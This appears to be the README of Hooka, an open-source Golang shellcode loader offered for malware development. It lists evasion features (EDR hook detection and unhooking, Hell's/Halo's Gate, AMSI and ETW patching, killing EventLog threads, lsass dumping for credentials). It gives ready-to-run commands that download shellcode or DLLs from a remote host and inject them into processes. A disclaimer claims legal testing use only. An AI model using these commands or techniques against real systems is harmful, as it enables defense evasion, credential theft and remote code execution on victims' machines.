~ Shellcode loader, hooks detector and more written in Golang ~
Introduction • Features • Usage • Library • Contributing • Disclaimer
I started this project to create a powerful shellcode loader with a lot of malleable capabilities via CLI flags like detecting hooked functions, using Hell's and Galo's Gate techniques and more. Why in Golang? Because it's a great language to develop malware and this project can help with it by providing an stable API with some functions which can be really useful. If you have any question feel free to open an issue or whatever you want.
However I've also taken some code from BananaPhone and Doge-Gabh projects (thanks a lot to C-Sto and timwhitez)
Tested on x64, Windows 10
-
Get shellcode from remote URL or local file
-
Shellcode reflective DLL injection (sRDI)
-
AMSI and ETW patch
-
Phant0m technique to kill EventLog threads (see here)
-
Detects hooked functions (i.e. NtCreateThread)
-
Compatible with base64 and hex encoded shellcode
-
Hell's Gate + Halo's Gate technique
-
Capable of unhooking user-mode syscalls via multiple techniques:
- Classic unhooking
- Full DLL unhooking
- Perun's Fart technique
-
Multiple shellcode injection techniques:
- CreateRemoteThread
- CreateProcess
- EnumSystemLocales
- Fibers
- QueueUserApc
- UuidFromString
- EtwpCreateEtwThread
- RtlCreateUserThread
-
Inject shellcode into a process (not stable and only works via CreateRemoteThread technique)
-
Dump lsass.exe process to a file
-
Windows API hashing (see here)
-
Test mode (injects calc.exe shellcode)
-
All already mentioned features available through official package API
This repo is under development so it may contain errors, use it under you rown responsability for legal testing purposes
- Just clone the repository like this:
git clone https://github.com/D3Ext/Hooka
cd Hooka
GOARCH=amd64 GOOS=windows go build .Before using the project you should know that there are some functions from ntdll.dll that aren't usually hooked but they always appear to be hooked. Here you have all false positives:
NtGetTickCount
NtQuerySystemTime
NtdllDefWindowProc_A
NtdllDefWindowProc_W
NtdllDialogWndProc_A
NtdllDialogWndProc_W
ZwQuerySystemTime
- Let's see some examples
Help panel
_ _ _ _
| | | | ___ ___ | | __ __ _ | |
| |_| | / _ \ / _ \ | |/ / / _` | | |
| _ | | (_) | | (_) | | < | (_| | |_|
|_| |_| \___/ \___/ |_|\_\ \__,_| (_)
by D3Ext - v0.1
-amsi
overwrite AmsiScanBuffer memory address to patch AMSI (Anti Malware Scan Interface)
-b64
decode base64 encoded shellcode
-dll string
path to DLL you want to inject with function name sepparated by comma (i.e. evil.dll,xyz)
-etw
overwrite EtwEventWrite memory address to patch ETW (Event Tracing for Windows)
-file string
path to file where shellcode is stored
-hex
decode hex encoded shellcode
-hooks
dinamically detect hooked functions by EDR
-lsass string
dump lsass.exe process memory into a file to extract credentials (run with high privs)
-phantom
use Phant0m technique to suspend EventLog threads (run with high privs)
-pid int
PID to inject shellcode into (only applies for certain techniques) (default: self)
-remote-dll string
remote url where DLL is stored, especify function separated by comma (i.e. https://192.168.1.37/evil.dll,xyz)
-t string
shellcode injection technique (default: 1):
1: CreateRemoteThread
2: CreateRemoteThreadHalos
3: CreateProcess
4: EnumSystemLocales
5: EnumSystemLocalesHalos
6: Fibers
7: QueueUserApc
8: UuidFromString
9: EtwpCreateEtwThread
10: RtlCreateUserThread
-test
test shellcode injection capabilities by spawning a calc.exe
-unhook int
overwrite syscall memory address to bypass EDR : 1=classic, 2=full, 3=Perun's Fart
-url string
remote url where shellcode is stored (e.g. https://192.168.1.37/shellcode.bin)
Detect hooked functions by EDR (including false positives)
.\Hooka.exe --hooksTest shellcode injection by spawning a calc.exe
.\Hooka.exe --testInject shellcode from URL or file
.\Hooka.exe --url https://192.168.116.37/shellcode.bin
.\Hooka.exe --file shellcode.binShellcode reflective dll injection (sRDI)
.\Hooka.exe --dll evil.dll,xyz
.\Hooka.exe --remote-dll https://192.168.1.37/evil.dll,xyzInject shellcode into remote process (i.e. werfault.exe) Not all techniques covered!!
.\Hooka.exe --url https://192.168.116.37/shellcode.bin --pid 5864Decode shellcode as hex or base64
.\Hooka.exe --file shellcode.bin --hex
.\Hooka.exe --file shellcode.bin --b64Use Hell's Gate + Halo's Gate to bypass AVs/EDRs
.\Hooka.exe -t CreateRemoteThreadHalos --url https://192.168.116.37/shellcode.binUnhook function before injecting shellcode
.\Hooka.exe --file shellcode.bin --unhook 3Patch AMSI and/or ETW
.\Hooka.exe --amsi --url https://192.168.116.37/shellcode.bin
.\Hooka.exe --etw --url https://192.168.116.37/shellcode.binKill EventLog service threads (run as admin)
.\Hooka.exe --phantomDump lsass.exe memory to extract credentials (run as admin)
.\Hooka.exe --lsass dump.tmpAs you can see Hooka provides a lot of CLI flags to help you in all kind of situations
Detecting hooks
Injecting shellcode via CreateRemoteThread technique
Injecting shellcode using custom flags
Test function
Dump lsass memory
☑️ More injection techniques
🔲 --pid flag to handle process injection
☑️ Sandboxing functions
☑️ Native golang Phant0m to suspend EventLog threads
🔲 Function to find PIDs which haven't loaded a given DLL (i.e. umppc16606.dll)
🔲 Remove Windows Defender privileges to make it useless (see here)
🔲 Test unhooking functions against EDRs
To use the official package API see here
Do you wanna improve the code with any idea or code optimization? You're in the right place
See CONTRIBUTING.md
You can take a look at some of the mentioned techniques here:
https://github.com/C-Sto/BananaPhone
https://github.com/timwhitez/Doge-Gabh
https://github.com/Ne0nd0g/go-shellcode
https://github.com/trickster0/TartarusGate
https://github.com/Kara-4search/HookDetection_CSharp
https://github.com/RedLectroid/APIunhooker
https://github.com/plackyhacker/Peruns-Fart
https://github.com/chvancooten/maldev-for-dummies
https://blog.sektor7.net/#!res/2021/perunsfart.md
https://teamhydra.blog/2020/09/18/implementing-direct-syscalls-using-hells-gate/
https://www.ired.team/offensive-security/defense-evasion/detecting-hooked-syscall-functions#checking-for-hooks
https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++
https://www.ired.team/offensive-security/defense-evasion/retrieving-ntdll-syscall-stubs-at-run-time
https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware
Creator isn't in charge of any and has no responsibility for any kind of: illegal use of the project, malicious act, capable of causing damage to third parties
Use this project under your own responsability!
See CHANGELOG.md
This project is licensed under MIT license
Copyright © 2023, D3Ext